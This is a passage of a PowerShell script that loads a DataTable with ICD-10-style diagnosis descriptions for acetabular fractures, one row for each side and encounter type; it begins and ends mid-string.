anterior column [iliopubic] of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of right acetabulum","Displaced fracture of anterior column [iliopubic] of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of left acetabulum","Displaced fracture of anterior column [iliopubic] of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of left acetabulum","Displaced fracture of anterior column [iliopubic] of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of left acetabulum","Displaced fracture of anterior column [iliopubic] of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of left acetabulum","Displaced fracture of anterior column [iliopubic] of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of left acetabulum","Displaced fracture of anterior column [iliopubic] of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of left acetabulum","Displaced fracture of anterior column [iliopubic] of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of unspecified acetabulum","Displaced fracture of anterior column [iliopubic] of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of unspecified acetabulum","Displaced fracture of anterior column [iliopubic] of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of unspecified acetabulum","Displaced fracture of anterior column [iliopubic] of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of unspecified acetabulum","Displaced fracture of anterior column [iliopubic] of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of unspecified acetabulum","Displaced fracture of anterior column [iliopubic] of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of unspecified acetabulum","Displaced fracture of anterior column [iliopubic] of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of right acetabulum","Nondisplaced fracture of anterior column [iliopubic] of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of right acetabulum","Nondisplaced fracture of anterior column [iliopubic] of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of right acetabulum","Nondisplaced fracture of anterior column [iliopubic] of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of right acetabulum","Nondisplaced fracture of anterior column [iliopubic] of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of right acetabulum","Nondisplaced fracture of anterior column [iliopubic] of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of right acetabulum","Nondisplaced fracture of anterior column [iliopubic] of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of left acetabulum","Nondisplaced fracture of anterior column [iliopubic] of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of left acetabulum","Nondisplaced fracture of anterior column [iliopubic] of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of left acetabulum","Nondisplaced fracture of anterior column [iliopubic] of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of left acetabulum","Nondisplaced fracture of anterior column [iliopubic] of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of left acetabulum","Nondisplaced fracture of anterior column [iliopubic] of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of left acetabulum","Nondisplaced fracture of anterior column [iliopubic] of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum","Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum","Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum","Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum","Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum","Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum","Nondisplaced fracture of anterior column [iliopubic] of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of right acetabulum","Displaced fracture of posterior column [ilioischial] of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of right acetabulum","Displaced fracture of posterior column [ilioischial] of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of right acetabulum","Displaced fracture of posterior column [ilioischial] of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of right acetabulum","Displaced fracture of posterior column [ilioischial] of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of right acetabulum","Displaced fracture of posterior column [ilioischial] of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of right acetabulum","Displaced fracture of posterior column [ilioischial] of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of left acetabulum","Displaced fracture of posterior column [ilioischial] of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of left acetabulum","Displaced fracture of posterior column [ilioischial] of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of left acetabulum","Displaced fracture of posterior column [ilioischial] of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of left acetabulum","Displaced fracture of posterior column [ilioischial] of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of left acetabulum","Displaced fracture of posterior column [ilioischial] of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of left acetabulum","Displaced fracture of posterior column [ilioischial] of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of unspecified acetabulum","Displaced fracture of posterior column [ilioischial] of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of unspecified acetabulum","Displaced fracture of posterior column [ilioischial] of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of unspecified acetabulum","Displaced fracture of posterior column [ilioischial] of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of unspecified acetabulum","Displaced fracture of posterior column [ilioischial] of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of unspecified acetabulum","Displaced fracture of posterior column [ilioischial] of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior column [ilioischial] of unspecified acetabulum","Displaced fracture of posterior column [ilioischial] of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of right acetabulum","Nondisplaced fracture of posterior column [ilioischial] of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of right acetabulum","Nondisplaced fracture of posterior column [ilioischial] of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of right acetabulum","Nondisplaced fracture of posterior column [ilioischial] of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of right acetabulum","Nondisplaced fracture of posterior column [ilioischial] of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of right acetabulum","Nondisplaced fracture of posterior column [ilioischial] of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of right acetabulum","Nondisplaced fracture of posterior column [ilioischial] of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of left acetabulum","Nondisplaced fracture of posterior column [ilioischial] of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of left acetabulum","Nondisplaced fracture of posterior column [ilioischial] of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of left acetabulum","Nondisplaced fracture of posterior column [ilioischial] of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of left acetabulum","Nondisplaced fracture of posterior column [ilioischial] of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of left acetabulum","Nondisplaced fracture of posterior column [ilioischial] of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of left acetabulum","Nondisplaced fracture of posterior column [ilioischial] of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum","Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum","Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum","Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum","Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum","Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum","Nondisplaced fracture of posterior column [ilioischial] of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right acetabulum","Displaced transverse fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right acetabulum","Displaced transverse fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right acetabulum","Displaced transverse fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right acetabulum","Displaced transverse fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right acetabulum","Displaced transverse fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right acetabulum","Displaced transverse fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left acetabulum","Displaced transverse fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left acetabulum","Displaced transverse fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left acetabulum","Displaced transverse fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left acetabulum","Displaced transverse fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left acetabulum","Displaced transverse fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left acetabulum","Displaced transverse fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified acetabulum","Displaced transverse fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified acetabulum","Displaced transverse fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified acetabulum","Displaced transverse fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified acetabulum","Displaced transverse fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified acetabulum","Displaced transverse fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified acetabulum","Displaced transverse fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right acetabulum","Nondisplaced transverse fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right acetabulum","Nondisplaced transverse fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right acetabulum","Nondisplaced transverse fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right acetabulum","Nondisplaced transverse fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right acetabulum","Nondisplaced transverse fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right acetabulum","Nondisplaced transverse fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left acetabulum","Nondisplaced transverse fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left acetabulum","Nondisplaced transverse fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left acetabulum","Nondisplaced transverse fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left acetabulum","Nondisplaced transverse fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left acetabulum","Nondisplaced transverse fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left acetabulum","Nondisplaced transverse fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified acetabulum","Nondisplaced transverse fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified acetabulum","Nondisplaced transverse fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified acetabulum","Nondisplaced transverse fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified acetabulum","Nondisplaced transverse fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified acetabulum","Nondisplaced transverse fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified acetabulum","Nondisplaced transverse fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of right acetabulum","Displaced associated transverse-posterior fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of right acetabulum","Displaced associated transverse-posterior fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of right acetabulum","Displaced associated transverse-posterior fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of right acetabulum","Displaced associated transverse-posterior fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of right acetabulum","Displaced associated transverse-posterior fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of right acetabulum","Displaced associated transverse-posterior fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of left acetabulum","Displaced associated transverse-posterior fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of left acetabulum","Displaced associated transverse-posterior fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of left acetabulum","Displaced associated transverse-posterior fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of left acetabulum","Displaced associated transverse-posterior fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of left acetabulum","Displaced associated transverse-posterior fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of left acetabulum","Displaced associated transverse-posterior fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of unspecified acetabulum","Displaced associated transverse-posterior fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of unspecified acetabulum","Displaced associated transverse-posterior fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of unspecified acetabulum","Displaced associated transverse-posterior fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of unspecified acetabulum","Displaced associated transverse-posterior fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of unspecified acetabulum","Displaced associated transverse-posterior fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced associated transverse-posterior fracture of unspecified acetabulum","Displaced associated transverse-posterior fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of right acetabulum","Nondisplaced associated transverse-posterior fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of right acetabulum","Nondisplaced associated transverse-posterior fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of right acetabulum","Nondisplaced associated transverse-posterior fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of right acetabulum","Nondisplaced associated transverse-posterior fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of right acetabulum","Nondisplaced associated transverse-posterior fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of right acetabulum","Nondisplaced associated transverse-posterior fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of left acetabulum","Nondisplaced associated transverse-posterior fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of left acetabulum","Nondisplaced associated transverse-posterior fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of left acetabulum","Nondisplaced associated transverse-posterior fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of left acetabulum","Nondisplaced associated transverse-posterior fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of left acetabulum","Nondisplaced associated transverse-posterior fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of left acetabulum","Nondisplaced associated transverse-posterior fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of unspecified acetabulum","Nondisplaced associated transverse-posterior fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of unspecified acetabulum","Nondisplaced associated transverse-posterior fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of unspecified acetabulum","Nondisplaced associated transverse-posterior fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of unspecified acetabulum","Nondisplaced associated transverse-posterior fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of unspecified acetabulum","Nondisplaced associated transverse-posterior fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced associated transverse-posterior fracture of unspecified acetabulum","Nondisplaced associated transverse-posterior fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of right acetabulum","Displaced fracture of medial wall of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of right acetabulum","Displaced fracture of medial wall of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of right acetabulum","Displaced fracture of medial wall of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of right acetabulum","Displaced fracture of medial wall of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of right acetabulum","Displaced fracture of medial wall of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of right acetabulum","Displaced fracture of medial wall of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of left acetabulum","Displaced fracture of medial wall of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of left acetabulum","Displaced fracture of medial wall of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of left acetabulum","Displaced fracture of medial wall of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of left acetabulum","Displaced fracture of medial wall of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of left acetabulum","Displaced fracture of medial wall of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of left acetabulum","Displaced fracture of medial wall of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of unspecified acetabulum","Displaced fracture of medial wall of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of unspecified acetabulum","Displaced fracture of medial wall of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of unspecified acetabulum","Displaced fracture of medial wall of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of unspecified acetabulum","Displaced fracture of medial wall of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of unspecified acetabulum","Displaced fracture of medial wall of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial wall of unspecified acetabulum","Displaced fracture of medial wall of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of right acetabulum","Nondisplaced fracture of medial wall of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of right acetabulum","Nondisplaced fracture of medial wall of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of right acetabulum","Nondisplaced fracture of medial wall of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of right acetabulum","Nondisplaced fracture of medial wall of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of right acetabulum","Nondisplaced fracture of medial wall of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of right acetabulum","Nondisplaced fracture of medial wall of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of left acetabulum","Nondisplaced fracture of medial wall of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of left acetabulum","Nondisplaced fracture of medial wall of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of left acetabulum","Nondisplaced fracture of medial wall of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of left acetabulum","Nondisplaced fracture of medial wall of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of left acetabulum","Nondisplaced fracture of medial wall of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of left acetabulum","Nondisplaced fracture of medial wall of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of unspecified acetabulum","Nondisplaced fracture of medial wall of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of unspecified acetabulum","Nondisplaced fracture of medial wall of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of unspecified acetabulum","Nondisplaced fracture of medial wall of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of unspecified acetabulum","Nondisplaced fracture of medial wall of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of unspecified acetabulum","Nondisplaced fracture of medial wall of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial wall of unspecified acetabulum","Nondisplaced fracture of medial wall of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right acetabulum","Displaced dome fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right acetabulum","Displaced dome fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right acetabulum","Displaced dome fracture of right acetabulum, 